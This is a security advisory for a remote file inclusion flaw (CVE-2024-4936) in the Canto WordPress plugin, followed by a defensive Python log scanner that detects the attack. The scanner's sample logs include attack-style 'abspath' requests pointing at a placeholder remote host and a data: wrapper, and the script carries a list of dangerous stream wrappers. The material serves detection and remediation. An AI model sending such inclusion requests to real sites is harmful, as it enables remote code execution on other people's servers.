WordPress · Canto · CVE-2024-4936
**Name of the Vulnerable Software and Affected Versions**
Canto plugin for WordPress versions up to, and including, 3.0.8
**Description**
The vulnerability allows unauthenticated attackers to include remote files on the server, resulting in remote code execution. The inclusion happens through the `abspath` parameter and is only exploitable when the PHP `allow_url_include` directive is enabled on the target site.
**Recommendations**
For versions up to, and including, 3.0.8, update to a version later than 3.0.8 to resolve the issue.
As a temporary workaround, consider disabling the `abspath` parameter until a patch is available.
Restrict access to the Canto plugin to minimize the risk of exploitation, and ensure the PHP `allow_url_include` directive is disabled to prevent code execution.
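As an added, defender-side example that is not part of this advisory, the following Python script flags access-log requests whose `abspath` query parameter points at a remote resource or stream wrapper (the condition under which `allow_url_include` turns this into code execution), and checks a php.ini fragment for that directive. The log lines, client addresses and the plugin endpoint path in them are constructed placeholders, not the real vulnerable endpoint.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# "combined" access-log line: client, identd, user, timestamp, request line, status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
# URL schemes and stream wrappers that include() can resolve remotely or via a
# wrapper; a legitimate local filesystem path never starts with one of these.
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps", "php", "data", "expect"}

def remote_abspath(target: str):
    """Return the decoded abspath value if it names a remote resource, else None."""
    qs = parse_qs(urlparse(target).query, keep_blank_values=True)
    for raw in qs.get("abspath", []):
        value = unquote(raw).strip()        # second decode catches %25-encoded evasion
        scheme = value.split(":", 1)[0].lower() if ":" in value else ""
        if scheme in REMOTE_SCHEMES:
            return value
    return None

def find_rfi_attempts(log_text: str):
    """Return (client_ip, status, abspath_value) for every suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and (value := remote_abspath(m["target"])) is not None:
            hits.append((m["ip"], int(m["status"]), value))
    return hits

def allow_url_include_enabled(ini_text: str) -> bool:
    """True if a php.ini fragment switches allow_url_include on (PHP's default is Off)."""
    enabled = False
    for line in ini_text.splitlines():
        line = line.split(";", 1)[0].strip()    # drop ini comments
        m = re.match(r"allow_url_include\s*=\s*(\S+)", line, re.IGNORECASE)
        if m:                                    # last assignment wins, as in PHP
            enabled = m.group(1).strip("\"'").lower() in {"1", "on", "true", "yes"}
    return enabled

# Constructed sample log lines; the endpoint path is a placeholder, not the real one.
SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2024:09:12:01 +0000] "GET /wp-content/plugins/canto/example.php?abspath=/var/www/html HTTP/1.1" 200 312
203.0.113.7 - - [10/May/2024:09:12:09 +0000] "GET /wp-content/plugins/canto/example.php?abspath=http://203.0.113.9/x.txt HTTP/1.1" 200 1044
203.0.113.7 - - [10/May/2024:09:12:15 +0000] "GET /wp-content/plugins/canto/example.php?abspath=data%3Atext%2Fplain%2CAA HTTP/1.1" 500 0
"""
```

Run `find_rfi_attempts(SAMPLE_LOG)` to get the two suspicious requests; a hit with status 200 while `allow_url_include_enabled()` reports the directive on should be treated as a likely successful inclusion and escalated.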